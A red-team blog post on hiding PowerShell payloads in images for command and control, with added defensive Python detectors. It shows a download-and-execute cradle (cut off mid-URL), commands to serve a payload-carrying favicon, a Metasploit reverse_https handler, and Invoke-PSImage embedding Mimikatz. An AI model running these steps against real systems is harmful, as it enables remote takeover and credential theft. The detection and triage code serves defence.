Penetration Testing Lab – Articles from the Pentesting Field

Command and Control – Images

January 2, 2018 | netbiosX | Red Team | Tags: C2, Command and Control, Red Team
Images have traditionally been used as a method of hiding a message, and searching for evidence inside such files is possibly the oldest trick in the book for forensic investigators. In offensive security and red teaming, however, pictures can hide commands, payloads and scripts.

Michael Scott developed a Python script which can generate an icon image and embed a PowerShell command into it. The first step is to write the command into a text file.

    echo 'IEX((new-object net.webclient).downloadstring("http://19
Figure: Favicon – Embedded Command

The next step is to create the favicon which will contain the embedded payload, start the Apache web server and move the icon to a web server directory.

    python create_favicon.py shellcode.txt evil.png
    service apache2 start
    mv evil.png /var/www/favicon.ico

Figure: Generation of Favicon

The Metasploit module multi/handler can be used to receive the connection once the command is executed on the target host.

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_https
    set LHOST XXX.XXX.XXX.XXX
    set LPORT 443

Figure: Metasploit – Multi Handler Module for Favicon

The Get-FaviconText PowerShell script will download the icon into a temporary directory and convert the pixels back to characters in order to execute the payload command.

    Import-Module .\readFavicon.ps1
    Get-FaviconText -URL http://192.168.1.171/favicon.ico -WriteTo

Figure: Implant – Favicon Configuration

The Get-FaviconText script is actually the implant which needs to be executed on the target. Even if permissions are not set on the web directory to allow access to this file, the payload command inside the icon will still run.

Figure: Implant – Favicon

A Meterpreter session will open and the target can be controlled through Metasploit.

Figure: Meterpreter via Favicon
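As an added defensive counterpart to the favicon technique described above (example code written for this page, not the post's own and not from the et0x/C2 project), the following Python heuristic flags a small image whose pixel channel bytes read like text rather than picture data. It assumes the encoding the post describes, characters written directly into pixel channel values; that is an assumption about the script, since the post does not show the encoder. The sample buffers, the `analyze_pixels` and `analyze_image_file` names and the thresholds are likewise constructed, and Pillow is needed only by the file-reading wrapper.

```python
# Added defensive example (not code from the original post or from the
# et0x/C2 project): a heuristic that flags small images whose pixel channel
# values look like a stored text payload rather than picture data. It assumes
# the encoding the post describes, characters written directly into pixel
# channel values, and it never decodes or executes anything it finds.

PRINTABLE = frozenset(range(0x20, 0x7F))  # printable 7-bit ASCII


def analyze_pixels(pixel_bytes, min_ratio=0.9, min_distinct=20):
    """Score raw pixel channel bytes (e.g. RGB triples) for text-likeness.

    Returns a dict with the printable-ASCII ratio, the number of distinct
    byte values and a 'flagged' verdict. Trailing zero bytes are ignored
    because a short payload would be followed by black padding.
    """
    body = pixel_bytes.rstrip(b"\x00")
    if not body:
        return {"ratio": 0.0, "distinct": 0, "flagged": False}
    printable = sum(1 for b in body if b in PRINTABLE)
    ratio = printable / len(body)
    distinct = len(set(body))
    # A flat fill (one grey value everywhere) also scores a ratio of 1.0, so
    # require the variety of byte values that natural-language text produces.
    flagged = ratio >= min_ratio and distinct >= min_distinct
    return {"ratio": ratio, "distinct": distinct, "flagged": flagged}


def analyze_image_file(path):
    """Apply the heuristic to an on-disk image (ICO, PNG, JPG, ...).

    Assumes Pillow is installed (pip install Pillow); it is only needed here.
    """
    from PIL import Image
    with Image.open(path) as im:
        raw = im.convert("RGB").tobytes()
    return analyze_pixels(raw)


# Constructed samples standing in for a 16x16 RGB icon (768 channel bytes).
# Gradient-like icon: every byte value 0..255 occurs, most are not printable.
ICON_LIKE = bytes(range(256)) * 3
# Text-carrying icon: a harmless pangram written straight into the channels.
TEXT_LIKE = (b"The quick brown fox jumps over the lazy dog 0123456789" * 20)[:768]

if __name__ == "__main__":
    for name, sample in (("icon-like", ICON_LIKE), ("text-like", TEXT_LIKE)):
        print(name, analyze_pixels(sample))
```

Run it over favicon.ico and other small images recovered from a proxy cache or a web root. A single-colour icon scores a ratio of 1.0 but far too few distinct values to trip the rule, while a photo-sized PNG can produce false positives, so treat the verdict as a triage hint that earns the file a closer look rather than as proof.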

However, it is also possible to use other types of images, such as JPG, to embed not just commands but full PowerShell scripts in order to perform various other post-exploitation activities. Barrett Adams developed a PowerShell module that can use the pixels of a PNG file to embed a PowerShell script. This module will also generate a one-liner command for execution:

    Import-Module .\Invoke-PSImage.ps1
    Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\77.jpg

Figure: Embedding Mimikatz in PNG – Web Version

Executing the one-liner will run Mimikatz through a PNG file that is stored on a web server.

Figure: Mimikatz via PNG over the Web


Alternatively, this script can generate a one-liner for an image that is hosted locally.

    Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\77.jpg

Figure: Embedding Mimikatz in PNG – Local Version

Running the command will execute Mimikatz from the PNG file.

Figure: Mimikatz via PNG – Local

Conclusion

Images can be used to execute shellcode and scripts and to perform other activities. There is a limitation in the number of characters that can be embedded, therefore only images with a lot of pixels can carry a script. It is an interesting method of hiding payloads in plain sight, and a type of threat that could be prevented if PowerShell was disabled across the network.
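Both the favicon implant and the Invoke-PSImage one-liner described on this page end the same way: PowerShell reads pixels and hands the decoded bytes to Invoke-Expression, and that step is visible in Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) even when the image is never written to disk. The following Python matcher is an added example, not code from the post, from et0x/C2 or from Invoke-PSImage; it assumes the decoder goes through the System.Drawing Bitmap API (an assumption, since the post does not show the decoder source), and the 4104 records, hostnames, user names and rule names are constructed for the example.

```python
# Added defensive example: not code from the original post, et0x/C2 or
# Invoke-PSImage. Matches PowerShell script block log text (Event ID 4104)
# for pixel decoding that feeds Invoke-Expression. Assumes the decoder uses
# System.Drawing's Bitmap/GetPixel API, which the post itself does not show.
import re

# Every pattern in a rule must match (case-insensitively) for the rule to fire.
RULES = {
    # Tool and script names that appear on this page.
    "known-tool-name": [r"Get-FaviconText|Invoke-PSImage|readFavicon\.ps1"],
    # Generic shape: a bitmap is loaded, pixels are read, the result is executed.
    "pixel-decode-to-iex": [
        r"System\.Drawing",
        r"\.GetPixel\(",
        r"\bIEX\b|Invoke-Expression",
    ],
}


def match_script_block(script_text):
    """Return the names of all rules whose patterns all occur in script_text."""
    return [
        name
        for name, patterns in RULES.items()
        if all(re.search(p, script_text, re.IGNORECASE) for p in patterns)
    ]


def triage(records):
    """records: iterable of dicts with host, user and script keys (fields a
    4104 event carries); returns one alert per record that matched a rule."""
    alerts = []
    for rec in records:
        hits = match_script_block(rec["script"])
        if hits:
            alerts.append({"host": rec["host"], "user": rec["user"], "rules": hits})
    return alerts


# Constructed 4104 records: a benign image conversion, a schematic (non-working)
# pixel-to-IEX decoder, and an import of a script named on this page.
SAMPLE_4104 = [
    {"host": "WS01", "user": "CORP\\alice", "script":
     "Add-Type -AssemblyName System.Drawing; "
     "$img = [System.Drawing.Image]::FromFile('C:\\pics\\a.png'); $img.Save('C:\\pics\\a.jpg')"},
    {"host": "WS02", "user": "CORP\\bob", "script":
     "Add-Type -AssemblyName System.Drawing; $b = New-Object System.Drawing.Bitmap($tmp); "
     "$c = $b.GetPixel($x, $y); IEX($decoded)"},
    {"host": "WS03", "user": "CORP\\carol", "script": "Import-Module .\\Invoke-PSImage.ps1"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_4104):
        print(alert)
```

The first record shows why the generic rule requires all three tokens: legitimate scripts use System.Drawing for image conversion, but they do not read pixels one by one and then execute the result. Pair the rule with the prevention the conclusion suggests: where PowerShell cannot be disabled outright, Constrained Language Mode blocks the Add-Type and arbitrary .NET object creation this decoding depends on, and Script Block Logging with a matcher like this covers the hosts where that cannot be enforced.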
References

https://github.com/et0x/C2
http://rwnin.net/?p=35
https://github.com/peewpw/Invoke-PSImage